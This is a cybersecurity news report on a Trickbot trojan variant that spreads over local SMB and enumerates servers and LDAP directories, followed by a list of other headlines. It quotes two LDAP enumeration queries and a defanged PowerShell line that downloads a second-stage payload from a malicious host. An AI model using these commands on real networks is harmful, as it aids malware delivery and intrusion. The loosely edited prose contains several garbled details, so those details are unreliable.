Sunday, May 19, 2024

New Version of Trickbot Trojan Spread via Local SMB to Perform NetServer and LDAP Enumeration

A New version of Banking Trojan Trickbot Trojan “1000029″ Spreading Via new Module  “worm64Dll” via Email Champaign that imitates as an invoice of largest Financial Institution via Local SMB

It performs scanning to find the list of servers using  NetServerEnum Windows API that spread locally via Server Message Block (SMB).

it also has the ability to performing an Enumeration to others computer using  Lightweight Directory Access Protocol (LDAP) enumeration.

Previous SMB Vulnerability Exploit  Major Impact through WannaCry and Petya Ransomware Global Outbreak.

Also Read  Mobile Banking Malware “Svpeng” Working as a Keylogger and Steals Contacts and Call Logs

Trickbot Trojan Execution Flow

Initially, TrickBot trying to find a list of servers that running on the Network using NetServerEnum and scans LDAP resources.

Trickbot Trojan

Trickbot performing this action using “MachineFinder” and “netscan” functions and NetServerEnum helps to lists all servers of the specified type that are visible in a domain.

Flashpoint Researchers said, More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

Trickbot creates 2 queries to perform LDAP Enumeration.

• (objectCategory=computer)
• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

it’s also the usage of the Python implementation of the SMB protocol “pysmb,”for querying the Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS) that authentication via NT LM 0.12.

Finally, Trickbot malware communicate with C&C server that injects Powershell scripts and download another Trickbot Malware that name as setup[.]exe,”

Same as Wannacry Ransomware Outbreak, it scan external IPs for SMB connections.

Powershell Script that used to inject to Download another Malware.

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

Trickbot Malware performs major impact with the various Financial institution in various countries and the main purpose of this malware infection to gain access the Local Area Network connection and acting as botnet and infection across the network.

Trickbot Malware also learning the methodology of biggest Global outbreak Ransomware Wannacry and Petya and replicate its Functions. Flashpoint said.

Also Read    Mobile Ransomware “LeakerLocker” Found in Play Store Apps that Encrypt and Send Personal Data on a Remote Server


Latest articles

Norway Recommends Replacing SSLVPN/WebVPN to Stop Cyber Attacks

A very important message from the Norwegian National Cyber Security Centre (NCSC) says that...

New Linux Backdoor Attacking Linux Users Via Installation Packages

Linux is widely used in numerous servers, cloud infrastructure, and Internet of Things devices,...

ViperSoftX Malware Uses Deep Learning Model To Execute Commands

ViperSoftX malware, known for stealing cryptocurrency information, now leverages Tesseract, an open-source OCR engine,...

Santander Data Breach: Hackers Accessed Company Database

Santander has confirmed that there was a major data breach that affected its workers...

U.S. Govt Announces Rewards up to $5 Million for North Korean IT Workers

The U.S. government has offered a prize of up to $5 million for information...

Russian APT Hackers Attacking Critical Infrastructure

Russia leverages a mix of state-backed Advanced Persistent Threat (APT) groups and financially motivated...

Millions Of IoT Devices Vulnerable To Attacks Leads To Full Takeover

Researchers discovered four significant vulnerabilities in the ThroughTek Kalay Platform, which powers 100 million...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Free Webinar

Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise.
Key takeaways include:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Related Articles